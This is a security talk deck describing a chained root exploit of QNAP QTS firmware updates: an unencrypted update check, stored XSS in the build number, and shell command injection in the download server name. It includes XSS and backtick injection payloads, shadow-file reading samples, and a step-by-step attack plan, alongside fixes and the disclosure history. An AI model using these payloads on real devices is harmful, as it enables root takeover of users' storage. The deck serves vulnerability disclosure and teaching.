0-DAY SHOWDOWN
3 vulns – 1 root RCE
Harry Sintonen
Disobey2017 0day-showdown

ABOUT
§ Me: Consultant @ F-Secure Cyber Security Services
§ Get to do stuff such as this for a living, yay!
§ Talk: Combining individual vulns for greater pro^Weffect
§ Alone, the vulns aren't necessarily easily exploitable
TARGET
§ OS: QNAP QTS 4.2.x “operating system” (Linux, various platforms, including ARM and AMD64)
§ Device: QNAP TVS-663
§ Access: Web UI, SSH, NFS, SMB etc.
VULN #1 – FW UPDATE MITM
§ CWE-311: Missing Transport Layer Security in Firmware Update Check
§ When an administrator logs in to the web interface, the device performs a firmware update check
§ The check is performed over plain HTTP
§ There is no transport layer security and no integrity check on the result

VULN #1 – FW UPDATE MITM
asus:~# urlsnarf -i eth0
…
asus - - [25/Aug/2016:14:49:30 +0300] "GET http://update.qnap.com/FirmwareRelease.xml HTTP/1.1" - - "-" "curl/7.43.0"

EFFECT #1 – FW UPDATE MITM
§ An attacker in a man-in-the-middle position can intercept and modify the firmware update check results
§ Can lie about the supposedly available firmware versions, download locations, etc.
VULN #2 – FW UPDATE XSS
§ CWE-79: Persistent XSS in Firmware Update Dialog
§ When a new update is found, the build number of the firmware is displayed to the user
§ The build number is embedded in the web interface HTML without encoding => Cross-Site Scripting vulnerability

VULN #2 – FW UPDATE XSS
§ Original FirmwareRelease.xml:
<buildNumber>20160823</buildNumber>
§ Evil FirmwareRelease.xml:
<buildNumber>&lt;img src=x onError="alert('hacked by h4x0r!')"&gt;&lt;/img&gt;</buildNumber>

VULN #2 – FW UPDATE XSS
(no text on this slide)

EFFECT #2 – FW UPDATE XSS
§ Attacker can perform actions as the user in the NAS web user interface
NOTE: The user is logged in as administrator –> full admin access!
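Added example, not code from the talk or from QNAP QTS: how a <buildNumber> taken from FirmwareRelease.xml reaches the update dialog once the XML parser has decoded the &lt; entities, with the unencoded rendering described on the slides beside the fix from the FIXING slide (HTML-encode output, validate input). The <docRoot>/<storage> wrapper around <buildNumber>, the dialog HTML template and the function names are assumptions, and the two XML documents are constructed from the fragments shown above.

```python
"""Added example, not code from the talk or from QNAP QTS.

Shows how a <buildNumber> taken from FirmwareRelease.xml reaches the
firmware update dialog: the unencoded rendering from the slides beside the
fix from the FIXING slide (HTML-encode output, validate input).
"""
import html
import re
import xml.etree.ElementTree as ET

# Constructed samples: the <buildNumber> fragments from the slides, wrapped in
# a minimal document so they parse. Nesting <buildNumber> under
# <docRoot>/<storage> is an assumption.
GOOD_XML = """<docRoot><storage><buildNumber>20160823</buildNumber></storage></docRoot>"""
EVIL_XML = """<docRoot><storage><buildNumber>&lt;img src=x onError="alert('hacked by h4x0r!')"&gt;&lt;/img&gt;</buildNumber></storage></docRoot>"""

# Stand-in for the real web UI dialog markup (assumption).
DIALOG = '<div id="fwupdate">New firmware available: build {}</div>'


def build_number(xml_text):
    """Return the build number the way an XML parser hands it to the UI:
    entities are already decoded, so &lt;img ...&gt; is a literal tag."""
    return ET.fromstring(xml_text).findtext("./storage/buildNumber")


def render_dialog_vulnerable(build):
    """The bug on the slide: value concatenated into HTML without encoding."""
    return DIALOG.format(build)


def render_dialog_fixed(build):
    """FIXING slide, part 1: HTML-encode on output. quote=True also escapes
    both quote characters, so the value is safe inside attributes as well."""
    return DIALOG.format(html.escape(build, quote=True))


# FIXING slide, part 2: validate input. Build numbers on the slides are
# eight-digit dates (20160823); anything else is refused before rendering.
BUILD_RE = re.compile(r"^[0-9]{8}$")


def accept_build_number(build):
    return bool(BUILD_RE.match(build))


if __name__ == "__main__":
    for xml_text in (GOOD_XML, EVIL_XML):
        b = build_number(xml_text)
        print("vulnerable:", render_dialog_vulnerable(b))
        print("fixed:     ", render_dialog_fixed(b))
        print("accepted:  ", accept_build_number(b))
```

Encoding alone already neutralises the payload; the allow-list is the second layer, so a malformed build number never reaches the template even if some other code path forgets to encode.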
VULN #3 – FW UPDATE CMD INJECTION
§ CWE-78: OS Command Injection in Firmware Update
§ When performing a firmware update, the firmware update tool performs an online check to see if the download server is up
§ The host name is included in a command executed by the shell => Command Injection

SO HOW TO FIND RCE VULNS?
§ Doesn't necessarily require binary reversing
§ Here the tools were:
  § tcpdump
  § find
  § strings
  § grep

SO HOW TO FIND RCE VULNS?
§ First pointed the firmware update servers to my host and fired up tcpdump to see traffic towards the host
§ Could see ICMP ECHO (ping) towards the host!
§ Guessed that the firmware update tool likely uses this for the “online” check
§ Maybe the host name is included in the ping command insecurely?

VULN #3 – FW UPDATE CMD INJECTION
[/] # find /home/httpd -type f | xargs grep -l FirmwareRelease.xml
/home/httpd/cgi-bin/sys/sysRequest.cgi
[/] # strings /home/httpd/cgi-bin/sys/sysRequest.cgi | grep -A1 FirmwareRelease.xml
http://update.qnap.com/FirmwareRelease.xml
/sbin/check_new_firmware "%s" 1>%s 2>&1

VULN #3 – FW UPDATE CMD INJECTION
[/] # strings /sbin/check_new_firmware | grep ping
/bin/ping -c 2 -w 60 %s > /tmp/ping_reply ; /bin/cat /tmp/ping_reply | /bin/grep time | /bin/cut -d '=' -f 4 | /bin/cut -d ' ' -f 1 ; /bin/rm -f /tmp/ping_reply

VULN #3 – FW UPDATE CMD INJECTION
§ Can inject arbitrary content into the command via the host name by using the usual tricks: `echo foo` or $(echo bar) etc.
§ The limitation is that the string is cut at the first / (forward slash), but this is easy enough to work around, for example with: `echo -e "\x2f"`

VULN #3 – FW UPDATE CMD INJECTION
§ Original FirmwareRelease.xml:
<docRoot>
  <storage>
    <downloadServer>
      <server>http://download.qnap.com/</server>
      <server>http://eu1.qnap.com/</server>
      <server>http://us1.qnap.com/</server>
    </downloadServer>
    …

VULN #3 – FW UPDATE CMD INJECTION
§ Evil FirmwareRelease.xml:
<docRoot>
  <storage>
    <downloadServer>
      <server>`touch pwned`</server>
    </downloadServer>
    …

EFFECT #3 – FW UPDATE CMD INJECTION
§ The attacker can execute arbitrary commands as root
§ –> access to all content on the device and more…
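Added example, not code from the talk or from QNAP QTS: the ping command line recovered with strings above, first assembled the vulnerable way so the backtick payload from the evil FirmwareRelease.xml is visible on the shell command line, then the fix from the FIXING slide (host name allow-list ^[a-zA-Z0-9.-]+$) combined with an argv-style exec that never hands the host to a shell. The host name extraction (drop the scheme, cut at the first /) is an assumption modelled on the "cut at first /" limitation described above, not the firmware's actual code; the sample <server> values are constructed and also show why a payload containing / breaks and how the \x2f trick avoids that.

```python
"""Added example, not code from the talk or from QNAP QTS.

Reconstructs how the <server> value from FirmwareRelease.xml reaches the
ping command line recovered with strings(1), then shows the fix: host name
validation with the regex from the FIXING slide, plus an argv exec that never
hands the host to a shell.
"""
import re

# Exact template from `strings /sbin/check_new_firmware | grep ping`.
PING_TEMPLATE = (
    "/bin/ping -c 2 -w 60 %s > /tmp/ping_reply ; "
    "/bin/cat /tmp/ping_reply | /bin/grep time | /bin/cut -d '=' -f 4 | "
    "/bin/cut -d ' ' -f 1 ; /bin/rm -f /tmp/ping_reply"
)


def host_from_server(server):
    """ASSUMPTION, modelled on 'the string is cut at first /': drop an
    optional scheme, then keep everything up to the first slash."""
    if "://" in server:
        server = server.split("://", 1)[1]
    return server.split("/", 1)[0]


def vulnerable_command(server):
    """The bug: the host name is pasted into a shell command line, so
    backticks and $(...) inside <server> are evaluated by /bin/sh as root."""
    return PING_TEMPLATE % host_from_server(server)


# Allow-list from the FIXING slide.
HOST_RE = re.compile(r"^[a-zA-Z0-9.-]+$")


def is_valid_host(server):
    return bool(HOST_RE.match(host_from_server(server)))


def safe_ping_argv(server):
    """Fixed: reject anything outside the allow-list and return an argv list
    for execv()/subprocess.run(argv) with shell=False. Even if the allow-list
    were loosened later, no shell parses the host, so `...` and $(...) are
    inert."""
    host = host_from_server(server)
    if not HOST_RE.match(host):
        raise ValueError("invalid host name in <server>: %r" % host)
    return ["/bin/ping", "-c", "2", "-w", "60", host]


if __name__ == "__main__":
    # Constructed <server> values: a legitimate one, the slide's payload,
    # a payload broken by the '/' cut, and the \x2f workaround.
    samples = [
        "http://download.qnap.com/",
        "`touch pwned`",
        "`cat /etc/shadow`",
        '`cat $(echo -e "\\x2fetc\\x2fshadow")`',
    ]
    for s in samples:
        print("server:    ", s)
        print("shell sees:", vulnerable_command(s).split(" > ")[0])
        print("valid host:", is_valid_host(s))
```

The regex alone would have stopped the exploit; passing the host as a separate argv element is the belt to that brace, because it removes the shell from the path entirely rather than relying on the allow-list staying strict.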
PUT IT ALL TOGETHER

EVIL^WCUNNING PLAN
1. Man in the Middle the FirmwareRelease.xml
2. Inject an arbitrary command to execute in the <server> XML element
3. Inject persistent XSS in the <buildNumber> XML element that automatically performs the firmware update, triggering the <server> command injection
4. Inject a <version> XML element that is always newer than the current firmware version, forcing the web interface to pop up the firmware update request

PRACTICAL ATTACK SCENARIO
1. Man in the Middle the victim's connection
2. Send a fake security bulletin
3. Admin logs on
4. ...
5. Profit!

(LIVE) DEMO
FIXING
§ CMD Injection: Validate the host name (^[a-zA-Z0-9.-]+$)
§ XSS: HTML-encode output (+ validate input)
§ Missing Transport Layer Security: Use HTTPS everywhere, validate the certificate chain & host name
§ Fixing any one of the vulns would prevent automated exploitation!
WHY WASN'T IT FOUND BEFORE?
§ Vulns are usually tested from user input arriving from the browser or other user input
§ It is not as interesting to pwn single devices as a big website with 100 million users
§ Maybe it has been, who knows!
VULN COORD
§ Reported to QNAP on Feb 1st 2016
§ After 180 days QNAP requested 90 more days: “We are still working on the fix for this issue, could you postpone the disclosure until 90 days later?”
§ Agreed to postpone. No fix materialized after 90 days
§ It has now been 1 year after the initial report, no fix
THANK YOU
Email: sintonen@iki.fi
More stuff: https://sintonen.fi/advisories/

f-secure.com
